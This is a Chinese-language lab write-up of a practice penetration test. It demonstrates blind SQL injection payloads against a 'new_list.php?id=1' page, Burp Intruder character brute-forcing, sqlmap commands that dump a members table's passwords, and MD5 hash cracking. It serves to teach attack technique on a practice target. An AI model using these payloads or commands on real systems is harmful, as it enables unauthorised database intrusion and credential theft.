2020年8月25日，第五次渗透测试。 通过对sql语句进行注入，数据库的库名，表名，字段进步爆破，最终获得key。

准备需求： 1.windows系统pc 2.2.burpsuite（bp）抓包软件 3.sqlmap sql 数据库的爆破工具

1.进入靶场 红框为靶场入口 进入以后我们看地址栏，结尾为php?id=1，大部分以id=XX结尾的网页都存在sql注入漏洞，所以我们来验证一下这是否是一个存在sql漏洞的网页。 2.在地址栏后面加上and 1=1，然后回车，网页可以正常打开，而当我们输入1=2时，网页没有信息显示，这证明这网页确实存在一个sql注入漏洞。 这是一个最简单的验证方法。原理是地址输入栏就相等于页面与数据库的一个接口，我们在地址栏上打上sql语句就等同于在sql数据库后台写入相等的sql语句，我们知道sql数据库也可以进行运算，当运算到1=1是一个true的结果，则语句会正常执行，而当1=2运算出来是一个false，则语句就会出现错误，执行失败，因此页面返回来的就是空白。 小干货：做sql，xss等页面的注入时，推荐使用火狐浏览器，因为其他浏览器当输入and 1=1时，空格会自动变成20%，而火狐不会，这有助于我们方便修改注入。 下面是【搜狗浏览器】 下面是【火狐浏览器】 3.我们确认了网页存在sql漏洞后，我们就可以进行sql语句注入的操作，通过注入分析，知道数据库的长度，数据库名称，表名，字段名等信息，这些信息都对我们彻底攻破数据库起重要作用。

判断库名的长度 再后面加上/new_list.php?id=1 and length(database())=1，内容显示空白，我们把1改为2，以此类推，当 length(database())=10的时候，页面就会正常显示，则表明，库名的长度为10. 4.库名爆破（两种方法） 方法一：通过bp软件，对库名进行爆破。 （1）首先在地址栏后面加上/new_list.php?id=1 and substr(database(),1,1)=‘b’ --+，然后开启bp的代理拦截，回车。我们打开bp界面，把拦截的数据发送给Intruder。 然后我们切换到爆破模块，在’b’处【添加§】，接着加入有效负荷选项，A-Z和a-z。 点击开始攻击 然后查看请求结果，看他们的长，如果某个有效负荷的值偏大，那么库名的第一位就是此字母。 因此库名的第一位是‘s’ （2）爆破第二位，我们需要把(database(),1,1)改为(database(),2,1)。 再进行攻击，查看请求结果，得出库名第二位为t，往后的以此类推。 最后得出完整库名为 stormgroup

往后还可以通过bp爆表名，字段，字段内容，数据等，但过程过于繁琐没有做到，有空可能会更新上。有兴趣可以自己尝试，大概方法和爆库名如出一致。 爆表名： /new_list.php?id=1 and substr((select table_name from information_schema.tables where table_schema=‘stormgroup’ limit 0,1),1,1))=‘m’ --+

爆字段： /new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member’ and table_schema=‘stormgroup’ limit 0,1))=4 --+

爆字段内容： /new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109

方法二：通过sqlmap软件，对库名进行爆破。 此方法运用到sqlmap工具，此工具是专门用来爆破说起来数据库的，方便，快捷，而且输入格式简单。相比用一个一个字母去爆破，省时省力。 （1）先打开sqlmap，输入sqlmap.py -u “http://219.153.49.228:40668/new_list.php?id=1” --dbs,然后系统会自动爆破库名。 红框处就是爆破出来的所有库名，其中stormgroup便是我们之前得出的库名。

注意：每次开启靶场的端口号都不一样，记得 修改端口号！！！修改端口号！！！修改端口号！！！ 别像我一样吃了大亏 （2）知道库名后我们开始爆破表名。 在sqlmao输入sqlmap.py -u “http://219.153.49.228:40668/new_list.php?id=1” -D stormgroup --tables （3）爆破表字段 在sqlmao输入sqlmap.py -u “http://219.153.49.228:40668/new_list.php?id=1” -D stormgroup -T member --columns （4）最后爆值，既是密码 在sqlmap输入sqlmap.py -u “http://219.153.49.228:40668/new_list.php?id=1” --dump -C password -T member -D stormgroup 最后网上破解MD5密码，得到明文密码（选取第二个密码）

MD5密码将不同位数的数字，字符，字母通过算法转化成一定位数的密文，此密文无法逆向验算，即密文无法通过一定算法逆向推到成原明文。MD5加密看是很安全，但是仍然有缺陷，既是同样明文验算出来的密文是一定的，例如用MD5加密123456，则无论试多少次，123456加密出来的结果都是相同的。所以，我们可以制作一本字典，把所有数字，字母的组合方式和对应的MD5码对应在一起，当你要破解时只要找到在字典中相同的MD5码，再对应上明文，这样就破解出来了，所以MD5码实则并不安全，放在网上分分钟被破解。 然后登陆，就得到key，提交，完成 这实验看似难，但其实也很简单。此靶场为了实验需求，因此安全防御不够，但在现实中，漏洞是不容易发现的，而已也不容易进行注入，大多都会对接口进行掩饰，或是有敏感字符的检测，所以在现实中攻击和黑入一个网站并不容易。 当然靶场更多的是让我们了解和熟悉攻击和黑入的过程，原理，而我们也不要在公网网站上进行渗透，即使是一个完全没有安全防御的网站也不可，因为这违法，并且非法入侵做了不当操作，会对他人或企业造成影响。

最后附上sqlmap的操作输入格式： 也简单介绍下sqlmap，sqlmap要在python2的环境下运行，所以首先要安装python2，配置好环境才能使用sqlmap，至于安装和下载步骤，网上一抓一大把，我也不多说。至于本人用的是网友制作的一个免python版的sqlmap。因为自己也在学python3，如果同时下载2会麻烦，所以直接下了个免python版的，有兴趣的可以百度找找。